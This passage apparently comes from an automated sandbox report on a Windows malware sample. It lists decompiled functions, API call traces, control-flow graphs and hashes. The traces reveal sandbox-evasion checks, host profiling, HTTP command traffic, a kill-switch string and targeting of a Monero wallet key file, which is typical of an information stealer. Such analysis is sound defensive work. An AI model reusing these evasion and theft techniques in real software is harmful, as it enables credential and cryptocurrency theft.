                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                              • Instruction ID: 91de966e16298bd3e484c94aa6f37a2f66022c045ce782f52fac566706700196
                              • Opcode Fuzzy Hash: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                              • Instruction Fuzzy Hash: 286207B5514200AFD3C8DFA8ED8996E3BF9F7CC601714851AA61DC3264DE39A8C1DB63
                              Function 00945510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 858 945510-945577 call 945ad0 call 94a820 * 3 call 94a740 * 4 874 94557c-945583 858->874 875 945585-9455b6 call 94a820 call 94a7a0 call 931590 call 9451f0 874->875 876 9455d7-94564c call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 874->876 892 9455bb-9455d2 call 94a8a0 call 94a800 875->892 902 945693-9456a9 call 94aad0 StrCmpCA 876->902 905 94564e-94568e call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 876->905 892->902 908 9457dc-945844 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 902->908 909 9456af-9456b6 902->909 905->902 1040 945ac3-945ac6 908->1040 910 9456bc-9456c3 909->910 911 9457da-94585f call 94aad0 StrCmpCA 909->911 914 9456c5-945719 call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 910->914 915 94571e-945793 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 910->915 929 945865-94586c 911->929 930 945991-9459f9 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 911->930 914->911 915->911 1018 945795-9457d5 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 915->1018 935 945872-945879 929->935 936 94598f-945a14 call 94aad0 StrCmpCA 929->936 930->1040 942 9458d3-945948 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 935->942 943 94587b-9458ce call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 935->943 965 945a16-945a21 Sleep 936->965 966 945a28-945a91 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 936->966 942->936 1044 94594a-94598a call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 942->1044 943->936 965->874 966->1040 1018->911 1044->936
                              APIs
                                • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009456A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945857
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 009452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 0094532F
                                • Part of subcall function 009452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 00945383
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 009453AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0094578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00945A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                              • Instruction ID: ced24c18dbb201631004875d677b0a25b965b4a3d7b57816d3f8fbea355d3a71
                              • Opcode Fuzzy Hash: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                              • Instruction Fuzzy Hash: 5FE1FD72950104ABDB14FBB0DC96FED737DAFD4304F508528B506671A2EF34AA49CBA2
                              Function 009417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1069 9417a0-9417cd call 94aad0 StrCmpCA 1072 9417d7-9417f1 call 94aad0 1069->1072 1073 9417cf-9417d1 ExitProcess 1069->1073 1077 9417f4-9417f8 1072->1077 1078 9419c2-9419cd call 94a800 1077->1078 1079 9417fe-941811 1077->1079 1081 941817-94181a 1079->1081 1082 94199e-9419bd 1079->1082 1084 941835-941844 call 94a820 1081->1084 1085 941970-941981 StrCmpCA 1081->1085 1086 9418f1-941902 StrCmpCA 1081->1086 1087 941951-941962 StrCmpCA 1081->1087 1088 941932-941943 StrCmpCA 1081->1088 1089 941913-941924 StrCmpCA 1081->1089 1090 94185d-94186e StrCmpCA 1081->1090 1091 94187f-941890 StrCmpCA 1081->1091 1092 941821-941830 call 94a820 1081->1092 1093 9418ad-9418be StrCmpCA 1081->1093 1094 9418cf-9418e0 StrCmpCA 1081->1094 1095 94198f-941999 call 94a820 1081->1095 1096 941849-941858 call 94a820 1081->1096 1082->1077 1084->1082 1115 941983-941986 1085->1115 1116 94198d 1085->1116 1106 941904-941907 1086->1106 1107 94190e 1086->1107 1112 941964-941967 1087->1112 1113 94196e 1087->1113 1110 941945-941948 1088->1110 1111 94194f 1088->1111 1108 941926-941929 1089->1108 1109 941930 1089->1109 1098 941870-941873 1090->1098 1099 94187a 1090->1099 1100 941892-94189c 1091->1100 1101 94189e-9418a1 1091->1101 1092->1082 1102 9418c0-9418c3 1093->1102 1103 9418ca 1093->1103 1104 9418e2-9418e5 1094->1104 1105 9418ec 1094->1105 1095->1082 1096->1082 1098->1099 1099->1082 1120 9418a8 1100->1120 1101->1120 1102->1103 1103->1082 1104->1105 1105->1082 1106->1107 1107->1082 1108->1109 1109->1082 1110->1111 1111->1082 1112->1113 1113->1082 1115->1116 1116->1082 1120->1082
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 009417C5
                              • ExitProcess.KERNEL32 ref: 009417D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: dff258eca261e480a961f1a966e479341528653b64dd5cacd7c2519876cf0f75
                              • Instruction ID: f59244c9c99dad16de2d8f535662eb7c5acdd08041d44fe350de526d989836e9
                              • Opcode Fuzzy Hash: dff258eca261e480a961f1a966e479341528653b64dd5cacd7c2519876cf0f75
                              • Instruction Fuzzy Hash: AF514DB5B14209EBDB04DFA1E994FBE77B5BF84704F108448E805A7380D774E985CB62
                              Function 00947500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1124 947500-94754a GetWindowsDirectoryA 1125 947553-9475c7 GetVolumeInformationA call 948d00 * 3 1124->1125 1126 94754c 1124->1126 1133 9475d8-9475df 1125->1133 1126->1125 1134 9475e1-9475fa call 948d00 1133->1134 1135 9475fc-947617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 947628-947658 wsprintfA call 94a740 1135->1137 1138 947619-947626 call 94a740 1135->1138 1145 94767e-94768e 1137->1145 1138->1145
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00947542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0094760A
                              • wsprintfA.USER32 ref: 00947640
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                              • Instruction ID: 6df8380ddd4e79737687fe88f489c4c59d73ff366d631d71bf4d387c66587923
                              • Opcode Fuzzy Hash: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                              • Instruction Fuzzy Hash: 364193B1D04248ABDF10DF94DC45FEEBBB8EF48704F104199F50967280DB78AA84CBA6
                              Function 009469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0828), ref: 009498A1
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0738), ref: 009498BA
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0750), ref: 009498D2
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F05D0), ref: 009498EA
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0600), ref: 00949903
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F87F8), ref: 0094991B
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E5488), ref: 00949933
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E55A8), ref: 0094994C
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0768), ref: 00949964
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0558), ref: 0094997C
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0780), ref: 00949995
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0618), ref: 009499AD
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E56C8), ref: 009499C5
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0798), ref: 009499DE
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 009311D0: ExitProcess.KERNEL32 ref: 00931211
                                • Part of subcall function 00931160: GetSystemInfo.KERNEL32(?), ref: 0093116A
                                • Part of subcall function 00931160: ExitProcess.KERNEL32 ref: 0093117E
                                • Part of subcall function 00931110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                • Part of subcall function 00931110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                • Part of subcall function 00931110: ExitProcess.KERNEL32 ref: 00931143
                                • Part of subcall function 00931220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                • Part of subcall function 00931220: ExitProcess.KERNEL32 ref: 00931294
                                • Part of subcall function 00946770: GetUserDefaultLangID.KERNEL32 ref: 00946774
                                • Part of subcall function 00931190: ExitProcess.KERNEL32 ref: 009311C6
                                • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                              • Sleep.KERNEL32(00001770), ref: 00946B04
                              • CloseHandle.KERNEL32(?,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                              • ExitProcess.KERNEL32 ref: 00946B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                              • Instruction ID: a8709b4448b0e10a5c9cb066cce7401b4fcb304d34767fe2e2c25624c2dc6cca
                              • Opcode Fuzzy Hash: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                              • Instruction Fuzzy Hash: 25311C71944208AAEB08FBF0DC56FEE7778EFC4345F104518F612A2192DF706A45CBA6
                              Function 00946AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1204 946af3 1205 946b0a 1204->1205 1207 946b0c-946b22 call 946920 call 945b10 CloseHandle ExitProcess 1205->1207 1208 946aba-946ad7 call 94aad0 OpenEventA 1205->1208 1214 946af5-946b04 CloseHandle Sleep 1208->1214 1215 946ad9-946af1 call 94aad0 CreateEventA 1208->1215 1214->1205 1215->1207
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                              • Sleep.KERNEL32(00001770), ref: 00946B04
                              • CloseHandle.KERNEL32(?,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                              • ExitProcess.KERNEL32 ref: 00946B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                              • Instruction ID: 02847ab1bc493557b1bb502969db6817ca87365872493851dbb5466d7143bdd8
                              • Opcode Fuzzy Hash: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                              • Instruction Fuzzy Hash: 41F08CB0A44219AFE740ABA0DC0AFBE7B78FB85701F104914F517E21C1CFB05980DAA7
                              Function 009347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a5ccee42a8156a60060367a773642a57d8ca289eff75d0d1a66333d85363c6ce
                              • Instruction ID: 7bfd19ad67aa5e5933e972e83da1d4c497f38f4a2901bd893c51b836af07b4f6
                              • Opcode Fuzzy Hash: a5ccee42a8156a60060367a773642a57d8ca289eff75d0d1a66333d85363c6ce
                              • Instruction Fuzzy Hash: 59213EB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625F915A7291EB706A09CF91
                              Function 009451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                                • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                                • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
